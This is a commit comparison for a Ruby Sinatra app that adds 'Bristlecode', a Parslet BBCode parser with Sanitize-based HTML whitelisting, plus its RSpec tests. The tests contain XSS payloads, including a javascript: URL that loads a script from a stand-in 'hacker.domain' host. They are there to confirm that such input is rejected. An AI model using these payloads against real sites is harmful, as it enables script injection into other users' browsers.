Compare commits

...

19 Commits

2
.gitignore vendored

@ -0,0 +1,2 @@
bin
.bundle

@ -0,0 +1,4 @@
--tty
--color
--format documentation
--require spec_helper

@ -5,3 +5,8 @@ gem "thin"
gem "slim"
gem "bb-ruby"
gem "ruby-bbcode"
gem "rspec", "~> 3.0"
gem "parslet"
gem "guard"
gem "guard-rspec"
gem "sanitize"

@ -0,0 +1,110 @@
GEM
remote: http://rubygems.org/
specs:
activesupport (4.2.4)
i18n (~> 0.7)
json (~> 1.7, >= 1.7.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
bb-ruby (1.1.0)
blankslate (3.1.3)
celluloid (0.15.2)
timers (~> 1.1.0)
coderay (1.1.0)
crass (1.0.2)
daemons (1.2.3)
diff-lcs (1.2.5)
eventmachine (1.0.8)
ffi (1.9.3)
formatador (0.2.5)
guard (2.6.1)
formatador (>= 0.2.4)
listen (~> 2.7)
lumberjack (~> 1.0)
pry (>= 0.9.12)
thor (>= 0.18.1)
guard-rspec (4.3.1)
guard (~> 2.1)
rspec (>= 2.14, < 4.0)
i18n (0.7.0)
json (1.8.3)
listen (2.7.9)
celluloid (>= 0.15.2)
rb-fsevent (>= 0.9.3)
rb-inotify (>= 0.9)
lumberjack (1.0.9)
method_source (0.8.2)
mini_portile (0.6.2)
minitest (5.8.2)
nokogiri (1.6.6.2)
mini_portile (~> 0.6.0)
nokogumbo (1.4.1)
nokogiri
parslet (1.7.1)
blankslate (>= 2.0, <= 4.0)
pry (0.10.0)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
slop (~> 3.4)
rack (1.6.4)
rack-protection (1.5.3)
rack
rb-fsevent (0.9.4)
rb-inotify (0.9.5)
ffi (>= 0.5.0)
rspec (3.1.0)
rspec-core (~> 3.1.0)
rspec-expectations (~> 3.1.0)
rspec-mocks (~> 3.1.0)
rspec-core (3.1.2)
rspec-support (~> 3.1.0)
rspec-expectations (3.1.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.1.0)
rspec-mocks (3.1.0)
rspec-support (~> 3.1.0)
rspec-support (3.1.0)
ruby-bbcode (2.0.0)
activesupport (>= 3.2.3)
sanitize (4.0.0)
crass (~> 1.0.2)
nokogiri (>= 1.4.4)
nokogumbo (= 1.4.1)
sinatra (1.4.6)
rack (~> 1.4)
rack-protection (~> 1.4)
tilt (>= 1.3, < 3)
slim (3.0.6)
temple (~> 0.7.3)
tilt (>= 1.3.3, < 2.1)
slop (3.5.0)
temple (0.7.6)
thin (1.6.4)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
rack (~> 1.0)
thor (0.19.1)
thread_safe (0.3.5)
tilt (2.0.1)
timers (1.1.0)
tzinfo (1.2.2)
thread_safe (~> 0.1)
PLATFORMS
ruby
DEPENDENCIES
bb-ruby
guard
guard-rspec
parslet
rspec (~> 3.0)
ruby-bbcode
sanitize
sinatra
slim
thin
BUNDLED WITH
1.10.6

@ -0,0 +1,4 @@
# Guard configuration: runs RSpec through Bundler. Both watchers below map
# any matching change to the whole "spec" directory.
guard(:rspec, cmd: 'bundle exec rspec') do
  whole_suite = proc { "spec" }

  # The library file itself.
  watch('bristlecode.rb', &whole_suite)
  # Any *_spec.rb file below spec/.
  watch(%r{^spec/.+(_spec\.rb)$}, &whole_suite)
end

@ -3,8 +3,9 @@ require 'slim'
require 'digest/sha1'
require 'bb-ruby'
require 'ruby-bbcode'
require './bristlecode.rb'
@@engines = ['bb-ruby', 'ruby-bbcode', 'raw']
@@engines = ['bb-ruby', 'ruby-bbcode', 'bristle', 'raw']
get '/' do
@posts = list_posts
@ -35,6 +36,8 @@ def exec_bbcode(engine, body)
BBRuby.to_html body
when "ruby-bbcode"
RubyBBCode.to_html body
when "bristle"
Bristlecode::to_html body
when "raw"
body
else

@ -0,0 +1,370 @@
require 'parslet'
require 'sanitize'
require 'uri'
module Bristlecode
# Sanitize transformer that lets YouTube embed iframes through.
#
# Any other node is ignored (the method returns nil). A matching iframe is
# re-sanitized with an iframe-only config and handed back as whitelisted.
class YoutubeFilter
  # @param env [Hash] transformer environment; reads :node, :node_name and
  #   :is_whitelisted
  # @return [Hash, nil] {:node_whitelist => [node]} for an accepted iframe,
  #   nil otherwise
  def call(env)
    candidate = env[:node]

    # Skip nodes that are already whitelisted and nodes that are not elements.
    return if env[:is_whitelisted]
    return unless candidate.element?
    return if env[:node_name] != 'iframe'

    # Accept http:, https: or protocol-relative sources on
    # (www.)youtube.com and (www.)youtube-nocookie.com only.
    from_youtube = candidate['src'] =~ %r|\A(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/|
    return unless from_youtube

    iframe_only = {
      :elements => %w[iframe],
      :attributes => {'iframe' => %w[allowfullscreen frameborder height src width]}
    }
    Sanitize.node!(candidate, iframe_only)

    {:node_whitelist => [candidate]}
  end
end
# Sanitize transformer for the markup of an embedded tweet: the Twitter
# widgets <script> and a <blockquote> (with its <a>).
class TweetFilter
  # Dispatches on the node name; every other node yields nil.
  #
  # @param env [Hash] transformer environment; reads :node, :node_name and
  #   :is_whitelisted
  # @return [Hash, nil] {:node_whitelist => [node]} when the node is accepted
  def call(env)
    element = env[:node]
    return if env[:is_whitelisted] || !element.element?

    handlers = {'script' => :script, 'blockquote' => :blockquote}
    handler = handlers[env[:node_name]]
    handler ? public_send(handler, env) : nil
  end

  # Accepts only the script whose src is exactly the Twitter widgets URL.
  #
  # NOTE(review): the attribute list below spells "aync", so the "async"
  # attribute is not whitelisted here. This looks like a typo for "async",
  # but the accompanying spec expects output without that attribute, so the
  # spelling is left untouched; fix both together.
  def script(env)
    tag = env[:node]
    return if tag['src'] != "//platform.twitter.com/widgets.js"

    script_only = {
      :elements => %w[script],
      :attributes => {'script' => %w[aync src charset]}
    }
    Sanitize.node!(tag, script_only)

    {:node_whitelist => [tag]}
  end

  # Re-sanitizes a blockquote so that only blockquote/a elements with
  # class/href attributes remain, then whitelists it.
  def blockquote(env)
    quote = env[:node]
    quote_only = {
      :elements => %w[blockquote a],
      :attributes => {'blockquote' => ['class'], 'a' => ['href']}
    }
    Sanitize.node!(quote, quote_only)

    {:node_whitelist => [quote]}
  end
end
# Sanitize configuration used by Bristlecode.sanitize_html.
#
# * only basic inline formatting, links, line breaks and images are allowed;
# * every <a> gets rel="nofollow";
# * link targets and image sources are limited to http, https and relative
#   URLs (images previously had no protocol restriction, unlike links);
# * YouTube iframes and tweet embeds are handled by the two transformers;
# * a <script> that is not accepted is removed together with its contents.
Config = Sanitize::Config::freeze_config(
  :elements => %w[b em i strong u a strike br img],
  :attributes => {
    'a' => ['href'],
    'img' => ['src'],
  },
  :add_attributes => {
    'a' => {'rel' => 'nofollow'}
  },
  :protocols => {
    'a' => {'href' => ['http', 'https', :relative]},
    'img' => {'src' => ['http', 'https', :relative]}
  },
  :transformers => [YoutubeFilter.new, TweetFilter.new],
  :remove_contents => ['script']
)
# Converts BBCode-style markup into sanitized HTML.
#
# The text is parsed, transformed into a node tree and rendered. When the
# parser rejects the input, the input is shown as literal text instead: it is
# HTML-escaped (on a copy, the caller's string is left alone) so that raw
# markup in an unparseable document is treated exactly like raw markup in a
# parseable one. Either way the result goes through sanitize_html.
#
# @param text [String] user-supplied markup
# @return [String] sanitized HTML
def Bristlecode.to_html(text)
  html =
    begin
      parse_tree = Bristlecode::Parser.new.parse(text)
      Bristlecode::Transform.new.apply(parse_tree).to_html
    rescue Parslet::ParseFailed
      literal = text.dup
      # clean! works in place; its return value is not relied upon.
      Bristlecode.clean!(literal)
      literal
    end

  Bristlecode.sanitize_html(html)
end
# Runs an HTML fragment through Sanitize with the module's Config.
#
# @param html [String] HTML fragment
# @return [String] the sanitized fragment
def Bristlecode.sanitize_html(html)
  whitelist = Bristlecode::Config
  Sanitize.fragment(html, whitelist)
end
# Replacement table used by clean!.
HTML_ESCAPES = {
  '&' => '&amp;',
  '<' => '&lt;',
  '>' => '&gt;',
  '"' => '&quot;',
  "'" => '&#x27;',
  '/' => '&#x2F;'
}.freeze

# HTML-escapes +text+ in place.
#
# All six characters are replaced in a single pass, so the "&" of an entity
# produced here is never escaped a second time. The string itself is always
# returned; previously the result was that of the last gsub!, i.e. nil
# whenever the text contained no "/".
#
# @param text [String] mutable string, modified in place
# @return [String] the same (now escaped) string object
def self.clean!(text)
  text.gsub!(/[&<>"'\/]/, HTML_ESCAPES)
  text
end
# Parslet grammar for the supported tags: [b], [i], [url], [url=...], [br],
# [img], [youtube] and [tweet].
class Parser < Parslet::Parser
  # --- document structure ---------------------------------------------------
  rule(:doc)      { elem.repeat.as(:doc) }
  rule(:children) { elem.repeat }
  rule(:elem)     { text.as(:text) | tag }
  rule(:tag)      { bold | italic | url | linebreak | img | youtube | tweet }
  # Plain text runs up to the next tag delimiter.
  rule(:text)     { anything_but(tag_delim).repeat(1) }
  rule(:eof)      { any.absent? }

  # --- delimiters -----------------------------------------------------------
  rule(:tag_open) {
    bold_open | italic_open | url_open | url_title_open | img_open |
      youtube_open | tweet_open
  }
  rule(:tag_close) {
    bold_close | italic_close | url_close | img_close | youtube_close |
      tweet_close
  }
  rule(:tag_delim) { tag_open | tag_close | linebreak }

  # --- [b] / [i]: end of input also counts as a closing tag -----------------
  rule(:bold_open)    { str('[b]') | str('[B]') }
  rule(:bold_close)   { str('[/b]') | str('[/B]') | eof }
  rule(:bold)         { bold_open >> children.as(:bold) >> bold_close }

  rule(:italic_open)  { str('[i]') | str('[I]') }
  rule(:italic_close) { str('[/i]') | str('[/I]') | eof }
  rule(:italic)       { italic_open >> children.as(:italic) >> italic_close }

  # --- [br] -----------------------------------------------------------------
  rule(:linebreak) { str('[br]').as(:br) }

  # --- [url]href[/url] and [url=href]title[/url] ----------------------------
  rule(:url_open)       { str('[url]') }
  rule(:url_close)      { str('[/url]') | eof }
  rule(:simple_href)    { anything_but(url_close).repeat }
  rule(:simple_url)     { url_open >> simple_href.as(:href) >> url_close }
  rule(:url_title_open) { str('[url=') }
  rule(:url_title_href) { anything_but(match(']')).repeat(1) }
  rule(:url_with_title) {
    url_title_open >> url_title_href.as(:href) >> match(']') >>
      children.as(:title) >> url_close
  }
  rule(:url) { (simple_url | url_with_title).as(:url) }

  # --- [youtube] / [tweet] / [img]: opaque, non-empty content ---------------
  rule(:youtube_open)  { str('[youtube]') }
  rule(:youtube_close) { str('[/youtube]') }
  rule(:youtube_url)   { anything_but(youtube_close).repeat(1) }
  rule(:youtube)       { (youtube_open >> youtube_url.as(:src) >> youtube_close).as(:youtube) }

  rule(:tweet_open)    { str('[tweet]') }
  rule(:tweet_close)   { str('[/tweet]') }
  rule(:tweet_url)     { anything_but(tweet_close).repeat(1) }
  rule(:tweet)         { (tweet_open >> tweet_url.as(:src) >> tweet_close).as(:tweet) }

  rule(:img_open)      { str('[img]') }
  rule(:img_close)     { str('[/img]') }
  rule(:img_src)       { anything_but(img_close).repeat(1) }
  rule(:img)           { (img_open >> img_src.as(:src) >> img_close).as(:img) }

  root(:doc)

  private

  # One character, provided +stop+ does not match at the current position.
  def anything_but(stop)
    stop.absent? >> any
  end
end
# Maps the hashes produced by Parser onto the node classes of this module.
class Transform < Parslet::Transform
  # Root and leaf nodes.
  rule(:doc => subtree(:doc))             { Doc.new(doc) }
  rule(:text => simple(:text))            { Text.new(text) }
  rule(:br => simple(:br))                { Linebreak.new }

  # Inline formatting, built from an array of child nodes.
  rule(:bold => sequence(:children))      { Bold.new(children) }
  rule(:italic => sequence(:children))    { Italic.new(children) }

  # Tags that receive their whole subtree.
  rule(:url => subtree(:url))             { Url.new(url) }
  rule(:img => subtree(:img))             { Img.new(img) }
  rule(:youtube => subtree(:youtube))     { Youtube.new(youtube) }
  rule(:tweet => subtree(:tweet))         { Tweet.new(tweet) }
end
# An ordered list of child nodes; renders by concatenating what each child
# renders.
#
# The output is built with map/join rather than StringIO: this file never
# requires "stringio", so the previous implementation only worked when some
# other library happened to have loaded it.
class Doc
  attr_accessor :children

  # @param children [Array] nodes responding to #to_html and #to_text
  def initialize(children)
    self.children = children
  end

  # @return [String] the children's HTML, concatenated in order
  def to_html
    children.map(&:to_html).join
  end

  # @return [String] the children's text form, concatenated in order
  def to_text
    children.map(&:to_text).join
  end
end
# A run of plain text, stored HTML-escaped.
class Text
  attr_accessor :text

  # @param text [#to_str] raw text. It is copied before escaping, so the
  #   caller's object is never modified and frozen strings are accepted
  #   (Bristlecode.clean! escapes in place).
  def initialize(text)
    self.text = text.to_str.dup
    Bristlecode.clean!(self.text)
  end

  # @return [String] the escaped text
  def to_html
    text
  end

  # @return [String] the escaped text (same as #to_html)
  def to_text
    text
  end
end
# [b]...[/b]: wraps its children in <b>.
class Bold
  attr_accessor :children

  # @param children [Array] child nodes; stored wrapped in a Doc
  def initialize(children)
    @children = Doc.new(children)
  end

  # @return [String] children rendered as HTML inside <b>...</b>
  def to_html
    ['<b>', children.to_html, '</b>'].join
  end

  # @return [String] children rendered as text inside [b]...[/b]
  def to_text
    ['[b]', children.to_text, '[/b]'].join
  end
end
# [i]...[/i]: wraps its children in <i>.
class Italic
  attr_accessor :children

  # @param children [Array] child nodes; stored wrapped in a Doc
  def initialize(children)
    @children = Doc.new(children)
  end

  # @return [String] children rendered as HTML inside <i>...</i>
  def to_html
    ['<i>', children.to_html, '</i>'].join
  end

  # @return [String] children rendered as text inside [i]...[/i]
  def to_text
    ['[i]', children.to_text, '[/i]'].join
  end
end
# [url]href[/url] or [url=href]title[/url].
#
# A link is rendered only when the href starts with "/" or http(s)://;
# anything else is echoed back as escaped text.
class Url
  attr_accessor :href, :title, :bad_href, :title_supplied

  # @param args [Hash] :href (required) and optionally :title (child nodes)
  def initialize(args)
    self.href = args[:href].to_str.strip
    self.title_supplied = args.has_key?(:title)
    self.title =
      if title_supplied
        Doc.new(args[:title])
      else
        # Without a title the href doubles as link text. Text gets its own
        # copy so that escaping the text never touches href.
        Text.new(href.dup)
      end
  end

  # Anchored with \A rather than ^: with ^ a multi-line value such as
  # "javascript:...\nhttp://x" passed the check because its second line
  # starts with an accepted prefix.
  #
  # @return [Integer, nil] truthy (0) when the href is acceptable
  def href_ok?
    href =~ /\A(\/|https?:\/\/)/
  end

  # @return [String] an <a> element, or the escaped text form for a bad href
  def to_html
    return to_text unless href_ok?
    "<a href=\"#{escaped_href}\">#{title.to_html}</a>"
  end

  # @return [String] the tag as HTML-escaped text
  def to_text
    if title_supplied
      # The title's own to_text is relied on for the title part.
      "[url=#{escaped_href}]#{title.to_text}[/url]"
    else
      text = "[url]#{href}[/url]"
      Bristlecode.clean!(text)
      text
    end
  end

  private

  # The href, HTML-escaped, so that quotes or angle brackets in it cannot
  # leave the attribute (or text) it is interpolated into.
  def escaped_href
    copy = href.dup
    Bristlecode.clean!(copy)
    copy
  end
end
# [br]: a forced line break. Carries no state.
class Linebreak
  # @return [String] the HTML line break element
  def to_html
    '<br>'
  end

  # @return [String] the tag as it is written in the markup
  def to_text
    '[br]'
  end
end
# [img]src[/img].
#
# An <img> is rendered only when the src starts with "/" or http(s)://;
# anything else is echoed back as escaped text.
class Img
  attr_accessor :src

  # @param img [Hash] parse subtree; reads :src
  def initialize(img)
    self.src = img[:src].to_str
  end

  # Anchored with \A rather than ^: with ^ a multi-line value such as
  # "javascript:...\nhttp://x" passed the check because its second line
  # starts with an accepted prefix.
  #
  # @return [Integer, nil] truthy (0) when the src is acceptable
  def src_ok?
    src =~ /\A(\/|https?:\/\/)/
  end

  # @return [String] an <img> element, or the escaped text form for a bad src
  def to_html
    return to_text unless src_ok?

    # Escape a copy so that a quote in the src cannot close the attribute.
    escaped = src.dup
    Bristlecode.clean!(escaped)
    "<img src=\"#{escaped}\">"
  end

  # @return [String] the tag as HTML-escaped text
  def to_text
    text = "[img]#{src}[/img]"
    Bristlecode.clean!(text)
    text
  end
end
# [youtube]url[/youtube]: embeds a video given a watch link
# (youtube.com/watch?v=ID) or a share link (youtu.be/ID).
class Youtube
  # Characters accepted in a video id. The id is interpolated into the
  # iframe src, so anything else is refused.
  VIDEO_ID_PATTERN = /\A[A-Za-z0-9_-]+\z/

  attr_accessor :raw_url, :video_id

  # @param args [Hash] parse subtree; reads :src
  def initialize(args)
    self.raw_url = args[:src].to_str.strip
    self.video_id = parse_url
  end

  # Extracts the video id from raw_url.
  #
  # Fixes over the previous version: a URL without a query string (query is
  # nil) or with a malformed query no longer raises, and an id containing
  # characters outside VIDEO_ID_PATTERN is rejected.
  #
  # @return [String, false] the video id, or false when the URL is not an
  #   http(s) YouTube URL carrying a usable id
  def parse_url
    uri = URI.parse(raw_url)
    return false unless %w[http https].include?(uri.scheme)
    return false unless %w[www.youtube.com youtube.com youtu.be].include?(uri.host)

    candidate =
      if uri.host == 'youtu.be'
        # Path is "/<id>"; drop the leading slash.
        uri.path[1..-1]
      else
        pair = URI.decode_www_form(uri.query.to_s).assoc('v')
        pair && pair.last
      end

    candidate =~ VIDEO_ID_PATTERN ? candidate : false
  rescue URI::InvalidURIError, ArgumentError
    # ArgumentError: decode_www_form rejects malformed query strings.
    false
  end

  # @return [String] the embed iframe, or the escaped text form when no
  #   video id could be extracted
  def to_html
    return to_text unless video_id
    "<iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/#{video_id}\" frameborder=\"0\" allowfullscreen></iframe>"
  end

  # @return [String] the tag as HTML-escaped text
  def to_text
    text = "[youtube]#{raw_url}[/youtube]"
    Bristlecode.clean!(text)
    text
  end
end
# [tweet]url[/tweet]: embeds a tweet given its status URL.
class Tweet
  attr_accessor :raw_url, :tweet_url

  # @param tweet [Hash] parse subtree; reads :src
  def initialize(tweet)
    @raw_url = tweet[:src].to_str.strip
    @tweet_url = parse_url(@raw_url)
  end

  # Checks that +url_in+ is an http(s) twitter.com URL whose path begins
  # with /<name>/status/<digits>.
  #
  # @param url_in [String] candidate URL
  # @return [String, false] scheme, host and path of the URL (query string
  #   and fragment dropped), or false when it is not accepted
  def parse_url(url_in)
    parsed = URI::parse(url_in)
    accepted = %w[http https].include?(parsed.scheme) &&
               parsed.host == 'twitter.com' &&
               parsed.path =~ /^\/[^\/]+\/status\/\d+/
    return false unless accepted

    [parsed.scheme, '://', parsed.host, parsed.path].join
  rescue URI::InvalidURIError
    false
  end

  # @return [String] the tweet blockquote plus the widgets script, or the
  #   escaped text form when the URL was not accepted
  def to_html
    if tweet_url
      %(<blockquote class="twitter-tweet"><a href="#{tweet_url}"></a></blockquote><script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>)
    else
      to_text
    end
  end

  # @return [String] the tag as HTML-escaped text
  def to_text
    escaped = "[tweet]#{raw_url}[/tweet]"
    Bristlecode.clean!(escaped)
    escaped
  end
end
end

@ -0,0 +1 @@
before the italics [i] in the italics [/i] after the italics

@ -0,0 +1,299 @@
require 'parslet/rig/rspec'
require_relative '../../bristlecode.rb'
module Bristlecode
# End-to-end examples for Bristlecode.to_html (markup in, sanitized HTML out),
# plus one example that calls Bristlecode.sanitize_html directly.
describe '.to_html' do
  def to_html(text)
    Bristlecode.to_html(text)
  end

  def sanitize_html(text)
    Bristlecode.sanitize_html(text)
  end

  # --- plain text and escaping ----------------------------------------------

  it 'leaves an empty string unchanged' do
    expect(to_html("")).to eq("")
  end

  it 'handles empty documents' do
    text = " \t \n \n \t"
    expect(to_html(text)).to eq(text)
  end

  it 'handles special chars' do
    expect(to_html('&')).to eq('&amp;')
    expect(to_html('>')).to eq('&gt;')
    expect(to_html('<')).to eq('&lt;')
  end

  it 'escapes tags' do
    input = '<script>alert(1)</script>'
    output = '&lt;script&gt;alert(1)&lt;/script&gt;'
    expect(to_html(input)).to eq(output)
  end

  it 'entirely removes unapproved script tags in sanitization' do
    input = '<script>alert(1)</script>'
    expect(sanitize_html(input)).to eq('')
  end

  it 'handles plain text just fine' do
    expect(to_html("plaintext")).to eq("plaintext")
  end

  # --- bold / italic --------------------------------------------------------

  it 'can bold stuff' do
    expect(to_html("[b]bold[/b]")).to eq("<b>bold</b>")
  end

  it 'can italic stuff' do
    expect(to_html("[i]italic[/i]")).to eq("<i>italic</i>")
  end

  it 'can nest tags' do
    doc = '[b] bold [i] italic [/i] bold [/b]'
    expected = '<b> bold <i> italic </i> bold </b>'
    out = to_html(doc)
    expect(out).to eq(expected)

    doc = '[i] italic [b] bold [/b] italic [/i]'
    expected = '<i> italic <b> bold </b> italic </i>'
    out = to_html(doc)
    expect(out).to eq(expected)
  end

  it 'auto-closes tags at eof' do
    expect(to_html("[b]bold")).to eq("<b>bold</b>")
    expect(to_html("[i]italic")).to eq("<i>italic</i>")
  end

  # --- links ----------------------------------------------------------------

  it 'can render simple links' do
    input = '[url]http://example.com[/url]'
    output = '<a href="http://example.com" rel="nofollow">http://example.com</a>'
    expect(to_html(input)).to eq(output)
  end

  it 'trims whitespace around urls' do
    input = '[url] http://example.com [/url]'
    output = '<a href="http://example.com" rel="nofollow">http://example.com</a>'
    expect(to_html(input)).to eq(output)
  end

  it 'passes simple url contents opaquely' do
    input = '[url]http://x[b]y[/b]z[/url]'
    output = '<a href="http://x%5Bb%5Dy%5B/b%5Dz" rel="nofollow">http://x[b]y[/b]z</a>'
    expect(to_html(input)).to eq(output)
  end

  it 'handles urls with titles' do
    input = '[url=http://google.com]the google[/url]'
    output = '<a href="http://google.com" rel="nofollow">the google</a>'
    expect(to_html(input)).to eq(output)
  end

  it 'ignores url tags with bad protocols' do
    input = '[url=javascript:alert(1)]google.com[/url]'
    expect(to_html(input)).to eq(input)

    input = '[url=ftp://something.com/filez]google.com[/url]'
    expect(to_html(input)).to eq(input)
  end

  it 'allows subtrees in <a> tags' do
    input = '[url=http://google.com]this is [b]the[/b] google[/url]'
    output = '<a href="http://google.com" rel="nofollow">this is <b>the</b> google</a>'
    expect(to_html(input)).to eq(output)
  end

  it 'rejects bad url protocols' do
    input = "[url=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url]"
    expect(to_html(input)).to eq(input)

    input = "[url=ftp://whatever.com/etc]warez[/url]"
    expect(to_html(input)).to eq(input)
  end

  # --- line breaks and images -----------------------------------------------

  it 'renders a linebreak' do
    expect(to_html('[br]')).to eq('<br>')
  end

  it 'renders an image' do
    input = '[img]http://example.com/cat.gif[/img]'
    expect(to_html(input)).to eq('<img src="http://example.com/cat.gif">')
  end

  it 'ignores bad image src protocols' do
    input = '[img]javascript:alert(1)[/img]'
    expect(to_html(input)).to eq(input)

    input = '[img]ftp://example.com/cat.gif[/img]'
    expect(to_html(input)).to eq(input)
  end

  it 'returns the original text on parse failure' do
    input = '[img]http://example.com/dog.gif[img]http://example.com/cat.gif[/img][/img]'
    expect(to_html(input)).to eq(input)

    input = '[url][url]x[/url][/url]'
    expect(to_html(input)).to eq(input)
  end

  # --- youtube --------------------------------------------------------------

  it 'can render a youtube video with a watch link' do
    input = '[youtube]https://youtube.com/watch?v=uxpDa-c-4Mc[/youtube]'
    output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
    expect(to_html(input)).to eq(output)

    input = '[youtube]https://www.youtube.com/watch?v=uxpDa-c-4Mc[/youtube]'
    output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
    expect(to_html(input)).to eq(output)
  end

  it 'can render a youtube video with a share link' do
    input = '[youtube]https://youtu.be/uxpDa-c-4Mc[/youtube]'
    output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
    expect(to_html(input)).to eq(output)
  end

  it 'refuses bad youtube urls' do
    input = '[youtube]http://example.com/cats.gif[/youtube]'
    expect(to_html(input)).to eq(input)
  end

  it "requires full url for youtube vids" do
    input = '[youtube]dQw4w9WgXcQ[/youtube]'
    expect(to_html(input)).to eq(input)
  end

  # --- tweets ---------------------------------------------------------------

  it 'can render a tweet' do
    input = '[tweet]https://twitter.com/jordanorelli/status/662654098156748800[/tweet]'
    output = '<blockquote class="twitter-tweet"><a href="https://twitter.com/jordanorelli/status/662654098156748800" rel="nofollow"></a></blockquote><script src="//platform.twitter.com/widgets.js" charset="utf-8"></script>'
    expect(to_html(input)).to eq(output)
  end

  it 'requires the full url for a tweet' do
    input = '[tweet]662654098156748800[/tweet]'
    expect(to_html(input)).to eq(input)
  end
end
# Grammar-level examples: each group exercises one rule of the parser through
# the `parse` matcher.
describe Parser do
  let(:parser) { Parser.new }

  describe '#parse' do
    it 'can parse an empty string' do
      expect(parser).to parse('')
    end

    it 'can parse whitespace' do
      expect(parser).to parse(' ')
    end

    it 'can parse plain text' do
      expect(parser).to parse('this is some plain text')
    end
  end

  describe '#bold' do
    it 'can parse correct bold text syntax' do
      [
        '[b]bolded contents here[/b]',
        '[b]bolded contents here[/B]',
        '[B]bolded contents here[/b]',
        '[B]bolded contents here[/B]'
      ].each { |markup| expect(parser.bold).to parse(markup) }
    end

    it 'can parse an empty bold tag' do
      expect(parser.bold).to parse('[b][/b]')
    end

    it 'can parse nested tags' do
      [
        '[b] one [b] two [/b] three [/b]',
        '[b] one [i] two [/i] three [/b]'
      ].each { |markup| expect(parser.bold).to parse(markup) }
    end

    it 'can parse an unclosed tag' do
      [
        '[b]bolded contents here',
        '[B]bolded contents here'
      ].each { |markup| expect(parser.bold).to parse(markup) }
    end

    it 'fails non-bold text' do
      expect(parser.bold).not_to parse('this is not bold')
    end

    it 'fails dangling close tags' do
      expect(parser.bold).not_to parse('before [/b] after')
    end

    it 'fails nonsense tag' do
      expect(parser.bold).not_to parse('[bold]fake content[/bold]')
    end
  end

  describe '#italic' do
    it 'can parse correct italic text syntax' do
      [
        '[i]italiced contents here[/i]',
        '[i]italiced contents here[/I]',
        '[I]italiced contents here[/i]',
        '[I]italiced contents here[/I]'
      ].each { |markup| expect(parser.italic).to parse(markup) }
    end

    it 'can parse an empty italic tag' do
      expect(parser.italic).to parse('[i][/i]')
    end

    it 'can parse nested tags' do
      [
        '[i] one [i] two [/i] three [/i]',
        '[i] one [b] two [/b] three [/i]'
      ].each { |markup| expect(parser.italic).to parse(markup) }
    end

    it 'can parse an unclosed tag' do
      [
        '[i]italiced contents here',
        '[I]italiced contents here'
      ].each { |markup| expect(parser.italic).to parse(markup) }
    end

    it 'fails non-italic text' do
      expect(parser.italic).not_to parse('this is not italic')
    end

    it 'fails dangling close tags' do
      expect(parser.italic).not_to parse('before [/i] after')
    end

    it 'fails nonsense tag' do
      expect(parser.italic).not_to parse('[italic]fake content[/italic]')
    end
  end

  describe '#url' do
    it 'can parse correct urls' do
      [
        '[url]google.com[/url]',
        '[url=google.com]google[/url]'
      ].each { |markup| expect(parser.url).to parse(markup) }
    end

    it 'can parse title subtrees' do
      expect(parser.url).to parse('[url=google.com]this is [b]google[/b] yo[/url]')
    end

    it "doesn't die on elements nested in simple urls" do
      expect(parser.url).to parse('[url]goog[b]le.c[/b]om[/url]')
    end

    it 'fails nested [url] tags' do
      expect(parser.url).not_to parse('[url]x[url]y[/url]z[/url]')
    end
  end

  describe '#linebreak' do
    it 'does its thing' do
      expect(parser.linebreak).to parse('[br]')
    end
  end

  describe '#img' do
    it 'accepts valid image urls' do
      [
        '[img]http://example.com/something.gif[/img]',
        '[img]https://example.com/something.gif[/img]'
      ].each { |markup| expect(parser.img).to parse(markup) }
    end
  end
end
end

@ -0,0 +1,9 @@
# Suite-wide RSpec settings.
RSpec.configure do |rspec|
  # Expectations: set include_chain_clauses_in_custom_matcher_descriptions.
  rspec.expect_with(:rspec) do |expectations|
    expectations.include_chain_clauses_in_custom_matcher_descriptions = true
  end

  # Mocks: set verify_partial_doubles.
  rspec.mock_with(:rspec) do |mock_config|
    mock_config.verify_partial_doubles = true
  end
end
Loading…
Cancel
Save